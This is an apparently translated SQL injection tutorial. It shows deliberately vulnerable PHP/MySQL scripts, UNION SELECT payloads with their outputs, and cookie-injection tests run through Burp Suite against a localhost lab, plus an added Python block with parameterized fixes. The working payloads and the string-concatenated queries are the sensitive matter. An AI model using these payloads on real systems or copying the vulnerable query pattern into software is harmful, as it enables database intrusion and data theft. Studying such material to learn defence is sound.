I. Injection by parameter type
(Idea: to find the closing character, read the statement from left to right; the second occurrence of a delimiter closes the first occurrence.)
Three types: string, numeric, and search
Search-type injection usually arises in search boxes
What distinguishes the three is how the delimiters (quotes) are used when the SQL statement is assembled:
select * from user where id=4                                      -- numeric-type SQL statement
select * from user where username='fanke'                          -- string-type SQL statement
select * from user where password like '%$pass%' order by password; -- search-type SQL statement
String type:
<?
//$id = $_GET['x'];
$user = $_GET['u'];
$conn = mysql_connect('127.0.0.1','root','root');
mysql_select_db('fanke',$conn);
//$sql = "select * from user where id=$id";
// the raw GET value is spliced into the quoted literal: a quote in the value
// closes the literal and whatever follows is parsed as SQL (string-type injection)
$sql = "select * from user where username='$user'";
$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
    echo "用户ID: ".$row['id']."<br>";
    echo "用户名: ".$row['username']."<br>";
    echo "用户密码: ".$row['password']."<br>";
}
mysql_close($conn);
echo "<hr>";
echo "你当前执行的sql语句为: ";
echo $sql;
http://127.0.0.1/php.php?u=fanke
用户ID: 4
用户名: fanke
用户密码: fanke
你当前执行的sql语句为: select * from user where username='fanke'
http://127.0.0.1/php.php?u=fanke order by 5
你当前执行的sql语句为: select * from user where username='fanke order by 5'
http://127.0.0.1/php.php?u=fanke' UNION SELECT 1,2,3,4,5'
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 1
用户名: 2
用户密码: 3
你当前执行的sql语句为: select * from user where username='fanke' UNION SELECT 1,2,3,4,5''
http://127.0.0.1/php.php?u=fanke' UNION SELECT 1,2,3,4,5,6'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\WWW\php.php on line 11
你当前执行的sql语句为: select * from user where username='fanke' UNION SELECT 1,2,3,4,5,6''
http://127.0.0.1/php.php?u=fanke' UNION SELECT user(),database(),@@version_compile_os,4,5'
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: root@localhost
用户名: fanke
用户密码: Win32
你当前执行的sql语句为: select * from user where username='fanke' UNION SELECT user(),database(),@@version_compile_os,4,5''
Search type:
<?
$name=$_GET['n'];
$pass=$_GET['p'];
$conn=mysql_connect("127.0.0.1","root","123456"); // connect to the MySQL database
if($conn){ echo "ok!"; }                           // check whether the connection succeeded
mysql_select_db('fanke',$conn);                    // select the database (fanke) on connection $conn
//$sql="select * from user where username='$name'"; // string-type query
// search-type query: the value sits between the LIKE wildcards inside a quoted literal,
// so a value beginning with %' closes both the wildcard and the literal (search-type injection)
$sql1="select * from user where password like '%$pass%' order by password";
//$result=mysql_query($sql);
$result1=mysql_query($sql1);
/*while($row = mysql_fetch_array($result)){
    echo "用户ID:".$row['id']."<br >";
    echo "用户名:".$row['username']."<br >";
    echo "用户密码:".$row['password']."<br >";
    echo "用户邮箱:".$row['email']."<br >";
}*/
while($row = mysql_fetch_array($result1)){
    echo "用户ID:".$row['id']."<br >";
    echo "用户名:".$row['username']."<br >";
    echo "用户密码:".$row['password']."<br >";
    echo "用户邮箱:".$row['email']."<br >";
}
mysql_close($conn); // close the database connection
echo "<hr>";
echo "你当前执行的sql语句为:";
//echo "select * from user where username='$name'";
echo $sql1;
?>
http://127.0.0.1/php.php?p=f
用户ID: 6
用户名: fanke4
用户密码: fank
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 5
用户名: fanke2
用户密码: fanke
你当前执行的sql语句为: select * from user where password like '%f%' order by password
http://127.0.0.1/php.php?p=f%' UNION SELECT 1,2,3,4,5'
用户ID: 1
用户名: 2
用户密码: 3
用户ID: 6
用户名: fanke4
用户密码: fank
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 5
用户名: fanke2
用户密码: fanke
你当前执行的sql语句为: select * from user where password like '%f%' UNION SELECT 1,2,3,4,5'%' order by password
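As an added illustration (not code from the original notes): the string-type and search-type query shapes above, rebuilt in Python over an in-memory SQLite table, each beside its parameterized form, so the effect of the quote placement can be checked directly. The five-column table, its rows, the email values and the function names are constructed assumptions; only id, username, password and email are named on the page, and the five-column width is taken from the UNION SELECT 1,2,3,4,5 that succeeded above.

```python
import sqlite3

# Constructed sample data (assumption): a five-column user table, the width
# implied by the notes' successful "UNION SELECT 1,2,3,4,5". The fifth column
# and the email addresses are invented placeholders.
ROWS = [
    (4, "fanke", "fanke", "fanke@example.invalid", ""),
    (5, "fanke2", "fanke", "fanke2@example.invalid", ""),
    (6, "fanke4", "fank", "fanke4@example.invalid", ""),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT,"
               " email TEXT, extra TEXT)")
    db.executemany("INSERT INTO user VALUES (?,?,?,?,?)", ROWS)
    return db


# --- vulnerable shapes, assembled exactly as the PHP on the page does ---
def string_concat(db, user):
    # The value is spliced into the quoted literal, so a quote inside it
    # closes the literal and the rest of the value is parsed as SQL.
    return db.execute(f"select * from user where username='{user}'").fetchall()


def search_concat(db, pass_):
    # Same flaw between the LIKE wildcards: a value starting with %' escapes.
    return db.execute(
        f"select * from user where password like '%{pass_}%' order by password"
    ).fetchall()


# --- hardened shapes: the value is bound as a parameter, never parsed as SQL ---
def string_param(db, user):
    return db.execute("select * from user where username=?", (user,)).fetchall()


def search_param(db, pass_):
    # The wildcards belong to the pattern, so they wrap the bound value
    # instead of being written into the SQL text.
    return db.execute(
        "select * from user where password like ? order by password",
        ("%" + pass_ + "%",),
    ).fetchall()


def injected_row_present(rows):
    # True when the attacker-controlled UNION row (1,2,3,4,5) came back.
    return any([str(v) for v in r] == ["1", "2", "3", "4", "5"] for r in rows)
```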
II. Injection by submission method
GET (the common case), POST (forms), COOKIE (covers both GET and POST, and bypasses checks applied only to the URL)
GET fetches data from the server; POST sends data to the server
Cookie theft vs. session hijacking (both concern user credentials): cookies are used to store the account and password, and cookie injection can also get past simple anti-injection filters (third-party anti-injection programs generally only filter GET and POST parameters)
Cookie storage: client side; lifetime can be long or short; low security; affects client performance (cache)
Session storage: server side; lifetime is usually short; higher security, but frequent client requests impact server performance (connection setup and teardown cost CPU, memory, etc.)
<?php
$name=$_POST['u'];
$pass=$_POST['p'];
$conn = mysql_connect('127.0.0.1','root','root');
if($conn){
    echo "mysql连接成功";
    echo "<hr>";
}
mysql_select_db('fanke',$conn);
// both POST fields are spliced into quoted literals: the same string-type flaw
// as the GET version, only the submission method differs
$sql="select * from user where username='$name' and password='$pass'";
$result=mysql_query($sql);
while($row = mysql_fetch_array($result)){
    echo "用户ID:".$row['id']."<br >";
    echo "用户名:".$row['username']."<br >";
    echo "用户密码:".$row['password']."<br >";
}
echo "当前执行的sql语句:".$sql;
mysql_close($conn);
?>
Password field: 'UNION SELECT user(),database(),@@version_compile_os,4,5'
http://127.0.0.1:81/1/1/shownews.asp?id=27
GET /1/1/shownews.asp?id=27 HTTP/1.1
Host: 127.0.0.1:81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU

Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 and 1=1
Content-Length: 21900
Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 and 1=2
Content-Length: 7133
Conclusion: the response Content-Length differs between the true condition (and 1=1) and the false one (and 1=2), which indicates a possible injection; the Content-Length for the true condition is 21900.
Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 order by 11
Content-Length: 21900
Conclusion:
Workflow: turn on intercept in Burp Suite; the browser sends a request; Burp Suite intercepts that packet; Forward releases it and intercepts the next request packet.
Once the packet intercepted and modified in the capture tool is sent on, the browser receives the response;
A packet intercepted from the browser can be sent to Repeater, modified in the left pane, with the response shown in the right pane of Repeater.